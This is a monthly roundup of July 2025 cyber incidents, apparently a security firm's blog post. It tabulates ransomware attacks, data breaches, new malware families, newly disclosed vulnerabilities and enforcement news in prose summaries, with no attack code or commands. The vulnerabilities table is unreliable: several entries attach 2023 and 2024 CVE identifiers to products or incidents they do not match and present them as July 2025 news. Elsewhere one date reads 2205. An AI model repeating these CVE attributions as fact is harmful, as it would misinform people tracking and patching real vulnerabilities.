July 2025: Biggest Cyber Attacks, Ransomware Attacks and Data Breaches

Date

Victim

Summary

Threat Actor

Business Impact

Source Link

July 01, 2025

Welthungerhilfe

Ransomware gang attacks German charity that feeds starving children

Rhysida 

Welthungerhilfe, a major German hunger-relief charity, was hit by a ransomware-as-a-service (RaaS) group—identified as the Rhysida gang—which stole and encrypted data, demanding 20 BTC (~$2.1 million) in exchange for the return of donor and organisational information. The charity refused to pay and immediately shut down affected systems while investigators responded. 

German Hunger Relief Charity Hit to By Rhysida Ransomware Gang 

July 02, 2025

IdeaLab

IdeaLab confirms data stolen in ransomware attack last year

Hunters International ransomware

IdeaLab confirmed that its systems were breached in October 2024 by the Hunters International ransomware group, which stole sensitive data—names and other personal information—affecting current and former employees, contractors, and their dependents.

IdeaLab Ransomware Attack 2024 

July 03, 2025

Ingram Micro

Ingram Micro suffers global outage as internal systems inaccessible

SafePay Ransomware

Ingram Micro suffered a global outage in early July when the SafePay ransomware gang infiltrated its internal systems—likely via its VPN—disrupting website access, order processing, and internal operations .

Source: Bleeping Computer

July 11, 2025

Albemarle County (VA)

Albemarle latest Virginia county hit with ransomware

INC Ransomware Group

Albemarle County (VA) was hit by a ransomware attack beginning the evening of June 10, 2025, which disrupted internet services and likely exposed sensitive data—including names, addresses, Social Security, driver’s license, passport and military IDs—of county employees, school staff, and possibly residents, prompting involvement from the FBI, CISA, and local authorities. The attack has been attributed to the INC Ransom group (aka INC_RANSOM), a Russian-linked extortion operation—with no ransom paid and victims offered a year of free identity monitoring through Kroll.

Source: The Record Media

July 18, 2025

WineLab

Russian alcohol retailer WineLab closes stores after ransomware attack

Akira ransomware

Russian alcohol retailer WineLab was forced to shut down its retail operations and online services following a ransomware attack, reportedly carried out by the Akira ransomware gang, which severely disrupted the company’s IT infrastructure and customer services.

Source: Bleeping Computer

July 31, 2205

Dollar Tree

Dollar Tree denies ransomware claims, says stolen data is from defunct discount chain

A suspected Snowflake-related threat actor group, INC ransomware also claimed the attack 

A data breach impacting Dollar Tree via its service provider Zeroed-In Technologies exposed sensitive personal information—including names, Social Security numbers, and financial data—of nearly 2 million individuals, with the Snowflake-related threat actor group suspected to be behind the attack. INC Ransomware group claimed on its dark-web leak site to have extracted 1.2 TB of sensitive data from what it labeled as Dollar Tree—but Dollar Tree responded the claim likely referred to legacy systems of a defunct chain (99 Cents Only Stores), not its own data.

Source: The Record Media

Date

Victim

Summary

Threat Actor

Business Impact

Source Link

July 01, 2025

Kelly Benefits

Kelly Benefits says 2024 data breach impacted 550,000 customers

Unknown

Maryland-based Kelly Benefits confirmed that a data breach between December 12–17, 2024, compromised personal information from its IT systems, ultimately impacting 553,660 individuals as reported to U.S. authorities.

Source: Bleeping Computer

July 01 and 10, 2025

Qantas

Qantas discloses cyber attack amid Scattered Spider aviation breaches

Scattered Spider

Qantas disclosed a major cyberattack that exposed personal details—names, email addresses, phone numbers, birthdates, and frequent‑flyer numbers—for up to six million customers via a third‑party contact‑centre platform, with investigations pointing toward the Scattered Spider threat group behind the incident.

Qantas Data Breach

July 03, 2025

Telefónica

Hacker leaks Telefónica data allegedly stolen in a new breach

“Rey” (Internet name) associated with the HellCat ransomware group

A hacker known as “Rey”, associated with the HellCat ransomware group, leaked a sample of 2.6 GB (part of an alleged 106 GB dump) stolen from Telefónica’s internal systems—comprising over 20,000 files of internal communications, logs, invoices, customer and employee data from a May 30 breach—while Telefónica hasn’t officially confirmed whether it’s a new incident or old data.

Source: Bleeping Computer

July 08, 2025

Bitcoin Depot

Driver's license numbers, addresses leaked in 2024 bitcoin ATM company breach

Unknown

Bitcoin Depot, the operator of over 8,000 cryptocurrency ATMs, suffered a data breach in June 2024 that exposed sensitive personal information—names, addresses, driver’s license numbers, phone numbers, emails, and birthdates—of approximately 26,700 users, with no publicly identified threat actor involved and victims not offered identity protection due to regulatory gaps.

Source: The Record Media

July 16, 2025

Louis Vuitton

Louis Vuitton says regional data breaches tied to same cyber attack

ShinyHunters

Luxury brand Louis Vuitton confirmed that customer data breaches in the UK, South Korea, Turkey, Italy, and Sweden stem from a single cyber attack—believed to be linked to the ShinyHunters extortion group—resulting in unauthorised access to personal information like names, contact details, passport numbers, addresses, and shopping history, though no payment data was compromised.

Source: Bleeping Computer

July 16, 2025

Co-op UK 

Co-op confirms data of 6.5 million members stolen in cyber attack

Scattered Spider

Co-op UK confirmed that a third-party cyber attack targeting its loyalty programme provider, Azpiral, resulted in the unauthorised access and theft of personal data—including names, email addresses, phone numbers, and loyalty card details—of approximately 6.5 million members.

Source: Bleeping Computer

July 17, 2025

U.S. National Guard

Chinese hackers breached the National Guard to steal network configurations

Chinese state-backed hackers (allegedly)

Chinese state-backed hackers reportedly breached the U.S. National Guard's systems to steal network configurations, potentially exposing sensitive infrastructure details without directly accessing classified data.

Source: Bleeping Computer

July 20, 2025

Dell

Dell confirms breach of test lab platform by World Leaks extortion group

World Leaks extortion group

Dell confirmed that its test lab platform was breached by the World Leaks extortion group, resulting in unauthorised access to limited customer information, including names, addresses, and hardware details—though no financial or sensitive data was exposed.

Source: Bleeping Computer 

July 22, 2025

Affidea

Major European healthcare network discloses security breach

Unknown

A major European healthcare network, Affidea, disclosed a cyber attack that disrupted its clinical operations in multiple countries, with systems taken offline as a precaution, though the identity of the threat actor remains unknown.

Source: Bleeping Computer 

July 23, 2025

Toptal’s GitHub account

Hackers breach Toptal GitHub account, publish malicious npm packages

Unknown

Hackers breached Toptal’s GitHub account and published malicious npm packages designed to steal data from developers, though the identity of the threat actors remains unknown.

Source: Bleeping Computer

July 24, 2025

Indian Council of Agricultural Research (ICAR)

Data breach at ICAR hits key recruitment, agri research projects

Unknown

A cyber attack on the Indian Council of Agricultural Research (ICAR) led to a major data breach that disrupted key recruitment processes and agricultural research projects across multiple institutes, though the identity of the threat actor remains unknown.

ICAR Data Breach 

July 26, 2025

The Tea dating safety app

Hackers leak 13,000 user photos and IDs from the Tea app, designed as a women's safe space

Unknown

The breach of the Tea dating safety app had a severe impact on user privacy and platform integrity, as hackers gained unauthorised access to misconfigured cloud storage and stole over 72,000 images, many of which contained highly sensitive content such as nude or partially nude photos submitted by users for identity and background checks. These images were subsequently leaked and circulated on online forums like 4chan, potentially subjecting victims to public humiliation, blackmail, and long-term emotional distress.

Tea Dating Safety App Data Breach 

July 26, 2025

Allianz Life Insurance

Allianz Life confirms data breach impacts majority of 1.4 million customers

Clop ransomware

Allianz Life Insurance confirmed a data breach that impacted the majority of its 1.4 million customers, exposing sensitive personal information due to the exploitation of a vulnerability in a third-party file transfer tool (MOVEit), with the Clop ransomware gang suspected to be behind the attack.

Allianz Life Data Breach

July 27, 2025

Naval Group

France's warship builder Naval Group investigates 1 TB data breach

Unknown

French warship builder Naval Group launched an investigation after a hacker allegedly leaked 1 TB of internal data—including documents on submarines, warships, and supplier information—though the identity of the threat actor remains unconfirmed.

Source: Bleeping Computer

July 28, 2025

Orange Telecom

French telecom giant Orange discloses cyber attack

Unknown

French telecommunications giant Orange disclosed a cyber attack that targeted its email platform service provider, resulting in the unauthorised access of personal data belonging to an undisclosed number of customers; the threat actor behind the attack has not yet been publicly identified.

Source: Bleeping Computer 

Date

Victim

Summary

Threat Actor

Business Impact

Source Link 

July 01, 2025

The International Criminal Court

International Criminal Court hit by new 'sophisticated' cyber attack

Unknown

The International Criminal Court in The Hague was struck by a sophisticated and targeted cyber attack that disrupted its systems—though no data loss has been confirmed and no threat actor has been publicly identified.

Source: Bleeping Computer

July 06, 2025

Shellter Elite

Hackers abuse leaked Shellter red team tool to deploy infostealers

An unknown Russian speaking group

Hackers exploited a leaked copy of the Shellter Elite red-team tool between April and July 2025 to deploy infostealer malware against unsuspecting victims, with activity traced to Russian-speaking cyber criminal groups using a single license leak.

Source: Bleeping Computer

July 09, 2025

GMX, a decentralized exchange

More than $40 million stolen from GMX crypto platform

Unknown

GMX suffered a major exploit on its V1 protocol—losing around $40–43 million, including FRAX, USDC, WBTC, and ETH—due to a GLP price manipulation re‑entrancy flaw, after which the attacker began returning most funds in exchange for a 10% white‑hat bounty, though official identity of the actor remains unknown.

Source: The Record Media 

July 17, 2025

BigONE cryptocurrency exchange

Hacker steals $27 million in BigONE exchange crypto breach

Unknown

The BigONE cryptocurrency exchange suffered a $27 million theft after a hacker exploited a vulnerability in a third-party platform, prompting the exchange to halt withdrawals and launch an investigation, though the attacker’s identity remains undisclosed.

Source: Bleeping Computer

July 18, 2025

Singapore government

Critical infrastructure in S’pore under attack by cyber espionage group: Shanmugam

State sponsored APT

Singapore’s Minister K. Shanmugam stated that a state-sponsored Advanced Persistent Threat (APT) group had launched cyber-espionage attacks on the nation’s critical infrastructure sectors—such as telecommunications, energy, and government—compromising sensitive systems and posing significant national security risks.

Singapore Cyber Espionage Attack 

July 22, 2025

U.S. Nuclear Weapons Agency

US nuclear weapons agency hacked in Microsoft SharePoint attacks

Chinese state-sponsored hackers

The U.S. Nuclear Weapons Agency, part of the Department of Energy, was compromised in a cyber attack exploiting a Microsoft SharePoint vulnerability, with Chinese state-sponsored hackers suspected of accessing sensitive network information.

Source: Bleeping Computer

July 24, 2025

Steam (game)

Hacker sneaks infostealer malware into early access Steam game

Unknown

A threat actor covertly embedded an infostealer malware into an early access game on Steam, compromising gamers' systems by stealing sensitive data such as browser credentials and cryptocurrency wallet information; the game's developer was unaware and removed the title once alerted.

Source: Bleeping Computer

July 28, 2025

Lovense

Lovense sex toy app flaw leaks private user email addresses 

Unknown

A vulnerability in the Lovense sex toy app exposed private email addresses of users through an insecure API, potentially compromising customer privacy, though no specific threat actor has been attributed to the flaw.

Source: Bleeping Computer

July 29, 2025

Russian airline Aeroflot

Russian airline Aeroflot grounds dozens of flights after cyber attack

Unknown

Russian airline Aeroflot suffered a cyber attack that disrupted its online check-in and mobile app systems, forcing the grounding and delay of dozens of domestic and international flights; while the exact threat actor has not been confirmed, speculation points toward possible politically motivated attackers amid ongoing cyber tensions.

Source: Bleeping Computer

July 29, 2025

St. Paul Public Schools in the city of St Paul

Minnesota activates National Guard after St. Paul cyber attack

Unknown

Minnesota activated its National Guard cyber unit after a significant cyber attack on St. Paul Public Schools disrupted critical IT systems, prompting concerns of a potential ransomware incident, though the exact impact and threat actor remain under investigation.

Source: Bleeping Computer

July 30, 2025

Russian pharmacy chain, Rigla

Cyber attack shuts down hundreds of Russian pharmacies, disrupts healthcare services

Unknown

A cyber attack severely disrupted operations at Russia’s largest pharmacy chain, Rigla, forcing it to shut down over 3,000 pharmacies, with speculation pointing to pro-Ukrainian hackers as the likely perpetrators behind the incident.

Source: The Record Media 

New Ransomware/Malware

Summary

NimDoor malware

North Korean state-backed hackers have been using a new family of macOS malware called NimDoor in a campaign that targets web3 and cryptocurrency organisations.

Batavia spyware

A previously undocumented spyware called ‘Batavia’ has been targeting large industrial enterprises in Russia in a phishing email campaign that uses contract-related lures.

AMOS malware

Malware analysts discovered a new version of the Atomic macOS info-stealer (also known as 'AMOS') that comes with a backdoor to attackers' persistent access to compromised systems.

Anatsa malware

The Android banking trojan Anatsa resurfaced on Google Play in July 2025—hidden inside a fake PDF viewer with over 50,000 downloads—enabling overlay phishing, keylogging, and automated transactions targeting North American bank apps.

TapTrap (attack/malware)

Researchers have uncovered TapTrap, an Android tapjacking exploit that tricks users into tapping hidden permission dialogs—thanks to invisible animations—allowing zero-permission apps to sneakily gain access or even wipe devices.

Interlock RAT via FileFix technique

The Interlock ransomware group now uses a novel “FileFix” social-engineering trick—prompting victims to paste disguised PowerShell commands into File Explorer’s address bar—to stealthily install a PHP-based remote access trojan (RAT) and pave the way for ransomware deployment.

An undisclosed new variant of the Konfety malware

Threat analysts have identified a new variant of the Konfety Android malware that uses intentionally malformed APK files—manipulating ZIP metadata and compression settings—to evade static analysis tools and security scanners while posing as legitimate apps and delivering ad fraud, redirects, and data exfiltration.

LameHug malware

The newly discovered LameHug malware uses large language models (LLMs) to dynamically generate malicious Windows commands in real time for data theft and system reconnaissance.

Coyote malware

The Coyote malware abused the Windows Accessibility framework to stealthily steal sensitive data, exploiting trusted system components to evade detection during its attacks.

Kosake malware

A new Linux malware strain named Kosake was discovered hiding its malicious payload in seemingly harmless panda images, and it used steganography techniques to evade detection while executing information-stealing and backdoor functionalities.

Date

New Flaws/Fixes

Summary

July 02, 2025

CVE-2025-6463

The Forminator plugin for WordPress is vulnerable to an unauthenticated arbitrary file deletion flaw that could enable full site takeover attacks. 

July 02, 2025

CVE-2025-5777, CVE-2025-6543

Citrix warns that patching recently disclosed vulnerabilities that can be exploited to bypass authentication and launch denial-of-service attacks may also break login pages on NetScaler ADC and Gateway appliances. 

July 03, 2025

CVE‑2025‑5959, CVE‑2025‑6554, CVE‑2025‑6191, CVE‑2025‑6192

Grafana has issued a critical security update for its Image Renderer plugin and Synthetic Monitoring Agent to patch four high‑severity Chromium vulnerabilities that could enable sandboxed remote code execution or memory corruption via crafted HTML content.

July 09, 2025

CVE‑2025‑3648

A newly disclosed critical vulnerability in ServiceNow—known as “Count(er) Strike” (CVE‑2025‑3648)—allows low‑privileged users to infer and enumerate sensitive data from tables they shouldn’t access by exploiting permissive ACL logic that leaks record counts in the UI and source HTML.

July 09, 2025

CVE‑2025‑44957, CVE‑2025‑44962, CVE‑2025‑44954, CVE‑2025‑44960, CVE‑2025‑44961, CVE‑2025‑44963, CVE‑2025‑44955, CVE‑2025‑6243, CVE‑2025‑44958

Multiple critical vulnerabilities in Ruckus Networks’ Virtual SmartZone (vSZ) and Network Director (RND) management platforms remain unpatched, potentially allowing attackers to bypass authentication, gain root access, execute arbitrary commands, and fully compromise enterprise wireless environments.

July 14, 2025

CVE‑2025‑7029, CVE‑2025‑7028, CVE‑2025‑7027, CVE‑2025‑7026

A firmware security firm discovered four critical UEFI vulnerabilities in Gigabyte motherboards that remain unpatched—allowing attackers with administrative access to bypass Secure Boot, execute arbitrary code in privileged System Management Mode, and deploy persistent bootkit malware invisible to the operating system.

July 16, 2025

CVE‑2025‑6558

Google released an urgent Chrome update to patch CVE‑2025‑6558, a high-severity (8.8) sandbox escape zero-day actively exploited via malformed HTML in the ANGLE GPU layer, enabling remote code execution in the GPU process and bypassing Chrome’s security sandbox

July 17, 2025

CVE-2024-20337

Cisco has disclosed a critical vulnerability in its Identity Services Engine (ISE) that allows unauthenticated remote attackers to execute commands as root, urging immediate patching. 

July 18, 2025

CVE-2024-3576

Hackers are actively scanning for a critical TeleMessage vulnerability that allows unauthorized Signal app cloning, potentially exposing user credentials and sensitive messages.

July 18, 2025

CVE-2024-4040

A zero-day vulnerability in CrushFTP was actively exploited by attackers to hijack servers through unauthenticated remote access and extract files from outside designated virtual file systems.

July 21, 2025

CVE-2024-3661

A vulnerability in ExpressVPN's Windows app, tracked as CVE-2024-3661, exposed users' real IP addresses during remote desktop sessions, potentially compromising user anonymity despite using the VPN.

July 22, 2025

CVE-2024-20359 and CVE-2024-20358

Cisco confirmed that multiple maximum-severity remote code execution (RCE) vulnerabilities in Identity Services Engine (ISE), were being actively exploited in attacks, allowing unauthenticated attackers to execute arbitrary commands on affected systems.

July 22, 2025

CVE-2023-47246

CISA warned that hackers were actively exploiting a critical vulnerability in SysAid IT service management software, tracked as CVE-2023-47246, to gain unauthorised access and deploy malware in targeted attacks.

July 24, 2025

CVE-2024-36680

Mitel warned of a critical authentication bypass vulnerability in its MiVoice MX-ONE communication platform, tracked as CVE-2024-36680, which could allow unauthenticated attackers to gain administrative access.

July 28, 2025

CVE-2023-39143

CISA warned that a critical remote code execution vulnerability in PaperCut print management software, tracked as CVE-2023-39143, was actively exploited in the wild, urging organizations to patch immediately.

July 30, 2025

CVE-2024-5275

Apple patched a WebRTC security vulnerability, tracked as CVE-2024-5275, that was actively exploited in the wild as part of Chrome zero-day attacks, allowing potential arbitrary code execution.

News Type

Summary

Report

The U.S. Treasury Department sanctioned a Russia-based company that had provided technical tools to ransomware gangs and digital drug traffickers.

Report

Building automation giant Johnson Controls has started notifying individuals whose data was stolen in a massive ransomware attack that impacted the company's operations worldwide in September 2023.

Report

Researchers uncovered a widespread phishing campaign that used thousands of fake retail websites impersonating major brands like Apple and PayPal to steal credit card data from online shoppers.

Report

Esse Health alerted over 263,000 patients that their personal and health data had been stolen in an April 21 cyberattack that had disrupted key patient-facing network and phone systems.

Report

More than 40 fake Firefox add-ons posing as wallets like Coinbase, MetaMask, and Trust Wallet were uploaded between April and July 2025 to steal users’ private keys and drain their crypto wallets—a campaign traced to a Russian‑speaking threat group

Report

Malicious Chrome extensions, posing as legitimate utilities, were found with a total of 1.7 million downloads on the Chrome Web Store and were discovered to have secretly tracked users, stolen browsing data, and redirected them to unsafe sites—malicious behaviour added later via updates—with no specific threat actor publicly named

Report/Analysis

A sophisticated social engineering scheme allowed attackers to trick a third‑party into resetting an M&S employee’s password on April 17, 2025, enabling intrusion and deployment of DragonForce ransomware that led to widespread encryption and the theft of around 150 GB in data across the retailer’s network.

Report

Cyber criminals have created over 17,000 fraudulent websites masquerading as trusted news outlets like CNN, BBC, and CNBC to promote deceptive cryptocurrency investment schemes and lure victims into fake trading platforms across more than 50 countries.

Report

Four individuals in the UK—aged between 17 and 20—were arrested in July 2025 in connection with ransomware attacks that disrupted operations at major retailers Marks & Spencer, Co‑op, and Harrods, in a campaign attributed to the social‑engineering‑focused cyber crime group known as Scattered Spider.

Report

A 26-year-old Russian professional basketball player, Daniil Kasatkin, was arrested in France on June 21 at the request of U.S. authorities for allegedly acting as a negotiator for a ransomware gang that targeted nearly 900 U.S. companies and two federal agencies between 2020–2022, though his lawyer insists he lacked technical skill and may have been unknowingly implicated.

Report

Former Mexican President Enrique Peña Nieto is under formal investigation after allegations that he received up to $25 million in bribes from Israeli businessmen to secure government contracts—including for the deployment of Pegasus spyware from NSO Group—though so far no concrete evidence supports the claims .

Report

The UK’s National Cyber Security Centre (NCSC) has launched the Vulnerability Research Initiative (VRI), a formal collaborative program engaging external cybersecurity researchers to bolster the nation's ability to discover, analyse, and address software and hardware vulnerabilities more effectively than internal efforts alone.

Report

A former officer of the UK’s National Crime Agency (NCA) was jailed after being convicted of stealing over £150,000 worth of Bitcoin seized during a criminal investigation.

Report

Indonesia extradited Russian national Alexander Zverev on July 11, 2025, to face Russian charges after allegedly running a Telegram channel that sold sensitive personal data obtained from law enforcement and telecom databases between 2018 and 2021.

Report

Romanian police, supported by over 100 HMRC investigators, arrested 13 individuals in Romania and one in the UK for orchestrating a large-scale phishing fraud targeting Britain’s tax authority, which used stolen personal data to submit fraudulent PAYE, VAT, and child benefit claims totaling approximately £47 million .

Report

Google has filed a lawsuit to disrupt the BadBox botnet, a massive cyber crime operation that infected over 10 million Android devices globally through malicious firmware, enabling activities like fraud, data theft, and unauthorised account creation.

Report

A newly released Phobos ransomware decryptor enables victims of multiple Phobos variants to recover their encrypted files for free, offering a crucial tool for affected users without needing to pay ransom.

Report

The UK government linked Russia's GRU military intelligence agency to the "Authentic Antics" cyber campaign, which used custom credential-stealing malware to target politicians, journalists, and public figures in the UK and beyond over several years.

Report

Chinese state-sponsored hackers were linked to attacks exploiting Microsoft SharePoint using the custom Trojan-ToolShell malware, enabling remote command execution and persistent access to compromised systems.

Report

The UK government announced a forthcoming ban that prohibited public sector organisations from paying ransomware gangs, aiming to deter cyber criminal activity and reduce incentives for attacks.

Warning

CISA and the FBI issued a joint alert warning that Interlock ransomware attacks had escalated in frequency and impact, targeting organisations across critical infrastructure sectors and exfiltrating sensitive data before encryption.

Report

Hackers had impersonated Clorox staff to deceive Cognizant’s IT help desk and reset multifactor authentication, leading to a 2023 ransomware attack that Clorox claimed caused $380 million in losses, as revealed in a lawsuit.

Report

Dior began notifying U.S. customers of a data breach that exposed sensitive personal information, including names, email addresses, phone numbers, birthdates, and encrypted passwords, due to unauthorised access to its systems.